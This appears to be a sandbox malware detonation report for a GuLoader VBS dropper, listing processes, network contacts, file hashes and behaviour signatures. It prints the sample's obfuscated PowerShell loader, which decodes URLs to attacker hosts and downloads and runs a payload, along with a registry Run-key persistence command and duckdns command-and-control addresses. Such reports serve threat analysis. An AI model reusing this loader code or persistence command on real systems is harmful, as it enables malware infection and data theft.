k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rzbivks"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ctganddgxs"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mvltovwilahgiw"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3272 -ip 3272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2904 -ip 2904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 400 -ip 400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rendl"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uyanmfeoj"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4264 -ip 4264

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eafgnxoixvow"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5116 -ip 5116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1352 -ip 1352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yityrwjukssqvydvandjmigzvicenqsn"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jkgq"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lembkhe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2844 -ip 2844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3348 -ip 3348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4252 -ip 4252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gtiapoyaaegbtlsibnyfqbzhygi"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qnnligjuwmyfesgmlxlyaguqymzijc"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2428 -ip 2428

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\apsdiruwkvqkggcyciyalsohhtjrcnjkn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2008 -ip 2008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\veovnxghxrveshhevumtbt"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xytnfqrblznicnvimfymegnyb"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1008 -ip 1008

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ibzygicczhfvftrmwqtoplhhbrpv"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4692 -ip 4692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4660 -ip 4660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nkailzhhjmbtbijwgfui"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pefaesrjwutydoyixqhcsma"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4648 -ip 4648

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zgttfkcdkcllovumhatdvqvyewm"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1228 -ip 1228

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1088 -ip 1088

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ungkjjxoyzpfawy"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\epmvcbhqmhhjckmwrxu"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hkzodusjapaomqiaiihrhr"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4556 -ip 4556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2804 -ip 2804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2104 -ip 2104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bznfhsmvvl"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ltayalxwjuwuax"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1700 -ip 1700

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wvgqadiqxcozldpwc"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1556 -ip 1556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1680 -ip 1680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qktifk"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tehsfdfdz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3292 -ip 3292

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dgmlyvqxnock"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2260 -ip 2260

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3340 -ip 3340

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ipnv"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\sktnwff"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vmyyxxqfyj"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2436 -ip 2436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2696 -ip 2696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3932 -ip 3932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 12

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 moviesmacktalk.com udp
RO 89.42.218.27:443 moviesmacktalk.com tcp
US 8.8.8.8:53 27.218.42.89.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 milanaces.com udp
BG 193.25.216.108:443 milanaces.com tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.18.190.80:80 r10.o.lencr.org tcp
US 8.8.8.8:53 108.216.25.193.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 janbours92harbu02.duckdns.org udp
US 192.169.69.26:3980 janbours92harbu02.duckdns.org tcp
US 192.169.69.26:3981 janbours92harbu02.duckdns.org tcp
US 8.8.8.8:53 janbours92harbu03.duckdns.org udp
US 8.8.8.8:53 26.69.169.192.in-addr.arpa udp
BE 172.111.244.38:3980 janbours92harbu03.duckdns.org tcp
BE 172.111.244.38:3980 janbours92harbu03.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 38.244.111.172.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.179.89.13.in-addr.arpa udp

Files

memory/3824-0-0x00007FF954D03000-0x00007FF954D05000-memory.dmp

memory/3824-1-0x000001FF70890000-0x000001FF708B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xevpyg1.cgr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3824-11-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

memory/3824-12-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

memory/3592-15-0x0000000003040000-0x0000000003076000-memory.dmp

memory/3592-16-0x0000000005CA0000-0x00000000062C8000-memory.dmp

memory/3592-17-0x0000000005AB0000-0x0000000005AD2000-memory.dmp

memory/3592-18-0x0000000005B50000-0x0000000005BB6000-memory.dmp

memory/3592-19-0x00000000062D0000-0x0000000006336000-memory.dmp

memory/3592-29-0x0000000006370000-0x00000000066C4000-memory.dmp

memory/3592-30-0x0000000006960000-0x000000000697E000-memory.dmp

memory/3592-31-0x00000000069A0000-0x00000000069EC000-memory.dmp

memory/3592-32-0x0000000008190000-0x000000000880A000-memory.dmp

memory/3592-33-0x0000000006EF0000-0x0000000006F0A000-memory.dmp

memory/3592-34-0x0000000007C30000-0x0000000007CC6000-memory.dmp

memory/3592-35-0x0000000007BC0000-0x0000000007BE2000-memory.dmp

memory/3592-36-0x0000000008DC0000-0x0000000009364000-memory.dmp

C:\Users\Admin\AppData\Roaming\Coqueluche14.myx

MD5 8e72b507dadf417f0f922a8cc04533d5
SHA1 d2fb1f560d46af90f009069855dc1f94179c5b6a
SHA256 84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c
SHA512 cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b

memory/3592-38-0x0000000009370000-0x000000000A320000-memory.dmp

memory/3824-40-0x00007FF954D03000-0x00007FF954D05000-memory.dmp

memory/3824-41-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

memory/4100-48-0x00000000020E0000-0x0000000003090000-memory.dmp

memory/3824-50-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

memory/2904-55-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3272-56-0x0000000000400000-0x0000000000462000-memory.dmp

memory/400-57-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4100-90-0x0000000003260000-0x0000000003279000-memory.dmp

memory/4100-94-0x0000000003260000-0x0000000003279000-memory.dmp

memory/4100-93-0x0000000003260000-0x0000000003279000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 18:54

Reported

2024-07-09 18:56

Platform

win7-20240708-en

Max time kernel

117s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Algoritmiskes = "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\\Coindication\\').Fyrsvamp;%Paginerende% ($elektronspillets)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3068 set thread context of 1240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1680 wrote to memory of 2692 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 2692 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 2692 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 3068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 3068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 3068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 3068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 2384 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 2384 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 2384 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 2384 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 1240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3068 wrote to memory of 1240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3068 wrote to memory of 1240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3068 wrote to memory of 1240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3068 wrote to memory of 1240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3068 wrote to memory of 1240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1240 wrote to memory of 2620 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 2620 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 2620 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 2620 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2620 wrote to memory of 1976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2620 wrote to memory of 1976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2620 wrote to memory of 1976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 